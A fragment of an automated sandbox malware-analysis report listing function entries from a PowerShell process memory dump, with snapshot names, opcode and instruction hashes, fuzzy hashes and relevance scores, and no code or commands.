                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04c527dba2225112cc4ba3b8aef379d62eb448d66131f34fcbfec32705f8ee71
                                        • Instruction ID: 4ecf5670b9c820271fb1627179cfae648f10a10a3a7493d6f0192a88460ec5e6
                                        • Opcode Fuzzy Hash: 04c527dba2225112cc4ba3b8aef379d62eb448d66131f34fcbfec32705f8ee71
                                        • Instruction Fuzzy Hash: 57213AB2505344DFDB25DF10D9C0F16BB65FB9C315F248569DC094B246C336D85ACBA2
                                        Function 06ED95A8 Relevance: 5.5, Strings: 4, Instructions: 494COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ~l$~l$~l$~l
                                        • API String ID: 0-2327373241
                                        • Opcode ID: 59de224ebe7ac2534d8e3b7b921d62a147d12e65606b96d71240240325a5ab92
                                        • Instruction ID: e112fe56ccffb4375b241792584a127d3136d450e2b00caf0d5627d7ef1272d5
                                        • Opcode Fuzzy Hash: 59de224ebe7ac2534d8e3b7b921d62a147d12e65606b96d71240240325a5ab92
                                        • Instruction Fuzzy Hash: 02F13732B003158FDBA09B699D007AAB7E6AFC5224F14847AD546CB292DB72CD46C7E1